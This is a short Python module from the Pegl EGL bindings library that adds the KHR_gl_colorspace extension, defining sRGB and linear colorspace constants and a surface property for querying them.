# along with Pegl. If not, see <http://www.gnu.org/licenses/>.
# Standard library imports.
from collections import namedtuple
# Local imports.
from ..surface import Surface
from ..attribs.surface import SurfaceAttribs
# New surface attributes.
GLColorSpaces = namedtuple('GLColorSpaces_tuple',
('SRGB', 'LINEAR')
)(0x3089, 0x308A)
SurfaceAttribs.extend('GL_COLORSPACE', 0x309D, GLColorSpaces,
GLColorSpaces.LINEAR)
# New Surface property for querying the new attribute.
def opengl_colorspace(self):
'''Get the OpenGL/OpenGL ES colorspace in use on this surface.'''
return self._attr(SurfaceAttribs.GL_COLORSPACE)
Surface.opengl_colorspace = property(opengl_colorspace)
| perey/pegl | src/pegl/ext/khr_glcolor.py | Python | gpl-3.0 | 1,654 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.